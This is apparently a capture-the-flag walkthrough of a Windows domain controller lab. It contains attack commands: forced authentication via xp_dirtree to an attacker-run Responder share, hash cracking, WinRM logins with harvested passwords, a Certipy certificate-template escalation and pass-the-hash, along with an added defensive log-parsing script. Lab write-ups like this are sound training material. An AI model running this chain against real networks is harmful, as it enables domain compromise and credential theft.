Netscan
10.10.11.202
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, starting udp (slowwwwww)"
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -o udp --min-rate 1000 $IP
LDAP reveals the domain:
dc.sequel.htb
sequel.htb
We can add these to /etc/hosts:
10.10.11.202 dc.sequel.htb sequel.htb dc
SMB
smbmap -H sequel.htb -u '' -p ''
No output.
Let's try netexec:
nxc smb dc.sequel.htb -u '' -p '' --shares
Did not work.
Adding any value to the username flag (a guest login) may give you access:
nxc smb sequel.htb -u 'random' -p '' --shares
That works.
Let's look at the public share:
smbclient.py random@sequel.htb
Enter nothing for the password.
There is a PDF in public; let's download it.
Reading through it, we find a user:
brandon.brown@sequel.htb
We also find credentials:
PublicUser:GuestUserCantWrite1
MSSQL - Lateral Movement
Let's log in to MSSQL:
impacket-mssqlclient PublicUser:GuestUserCantWrite1@sequel.htb
What can we do?
No command execution (xp_cmdshell is disabled) :(
Can't enable it either.
We do have permissions for directory listing: xp_dirtree
We use that to force authentication to a rogue share and capture the Net-NTLMv2 hash.
Set up Responder:
sudo responder -I tun0
Then call any share on our host with xp_dirtree:
xp_dirtree \\10.10.16.2\pwn
Crack with hashcat (NTLMv2 is mode 5600):
hashcat -m 5600 sql_hash /usr/share/wordlists/rockyou.txt
Cracked:
sql_svc:REGGIE1234ronnie
More access?
Maybe we can use xp_cmdshell as this user?
impacket-mssqlclient sql_svc:REGGIE1234ronnie@sequel.htb
ALWAYS SPRAY ACROSS ALL SERVICES WHEN YOU FIND CREDS
We have WinRM access:
evil-winrm -u 'sql_svc' -p 'REGGIE1234ronnie' -i sequel.htb
Check the Users directory.
We need to pivot into Ryan.Cooper.
We find an SQL Server error log backup file in:
C:\SQLServer\Logs> type ERROR*
Interesting entries:
2022-11-18 13:43:06.74 spid9s SQL Trace ID 1 was started by login "sa".
2022-11-18 13:43:06.74 spid9s Server name is 'DC\SQLMOCK'. This is an informational message only. No user action is required.
2022-11-18 13:43:06.75 spid14s Starting up database 'mssqlsystemresource'.
2022-11-18 13:43:06.75 spid9s Starting up database 'msdb'.
2022-11-18 13:43:06.75 spid18s Password policy update was successful.
Possible account to Kerberoast (the SPN registered for the service):
MSSQLSvc/dc.sequel.htb:SQLMOCK
Possible credential:
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
NuclearMosquito3
It's possible the user entered their password in the username prompt, causing it to be logged in clear text.
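Added detection example (not part of the original notes): a small Python parser run over constructed ERRORLOG lines modelled on the entries above. It flags a failed logon whose "user" is not account-shaped and which follows, from the same client within a few seconds, a failure for a real account, the tell for a password typed into the username field that a defender can hunt for before an attacker reads the log.

```python
import re
from datetime import datetime

# Constructed sample modelled on the ERRORLOG entries quoted above (not the real file).
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:06.74 spid9s SQL Trace ID 1 was started by login "sa".
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:50:00.00 Logon Logon failed for user 'sequel.htb\\sql_svc'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
"""

LOGON_FAIL = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)

def parse_logon_failures(text):
    """Yield (timestamp, user, client) for every failed-logon line."""
    for line in text.splitlines():
        m = LOGON_FAIL.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m["user"], m["client"]

def looks_like_account(user):
    """True for names in DOMAIN\\user, user@domain or first.last form."""
    return "\\" in user or "@" in user or "." in user

def find_leaked_secrets(text, window_s=5.0):
    """Pair each non-account-shaped failure with the most recent account
    failure from the same client inside window_s seconds.
    Returns a list of (suspect_string, likely_account) tuples."""
    events = list(parse_logon_failures(text))
    hits = []
    for i, (ts, user, client) in enumerate(events):
        if looks_like_account(user):
            continue
        for pts, puser, pclient in reversed(events[:i]):
            if (ts - pts).total_seconds() > window_s:
                break
            if pclient == client and looks_like_account(puser):
                hits.append((user, puser))
                break
    return hits

if __name__ == "__main__":
    for _secret, account in find_leaked_secrets(SAMPLE_ERRORLOG):
        print(f"possible password in username field, owner={account!r}; rotate it")
```

The script deliberately reports only the owning account, not the suspect string, so the finding can be ticketed without copying the leaked value around.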
nxc smb sequel.htb -u 'Ryan.Cooper' -p 'NuclearMosquito3'
Valid creds.
WinRM with the new creds:
evil-winrm -u 'Ryan.Cooper' -p 'NuclearMosquito3' -i sequel.htb
User flag!
79e2....f42
Priv Esc
After looking around for a long time, I had to read a writeup. This box is vulnerable to an AD CS (certificate template) attack.
We can check with nxc first:
nxc ldap 10.10.11.202 -u ryan.cooper -p NuclearMosquito3 -M adcs
We can use Certipy to find the vulnerable template:
certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
Found UserAuthentication; the template allows client authentication.
We can now request a PFX for the administrator UPN:
certipy-ad req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
Now we can see if we can authenticate with it, get a TGT and get the NT hash:
certipy-ad auth -pfx administrator.pfx
Error :(
For certain Kerberos functions to work properly, the local and remote clocks must be in sync (KRB_AP_ERR_SKEW otherwise).
We can sync with ntpdate:
sudo apt install ntpdate
sudo ntpdate -u sequel.htb
Then just auth with the hash (pass-the-hash):
administrator:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
evil-winrm -u 'administrator' -H 'a52f78e4c751e5f5e17e1e9f3e58f4ee' -i sequel.htb
Final flag:
c663....3c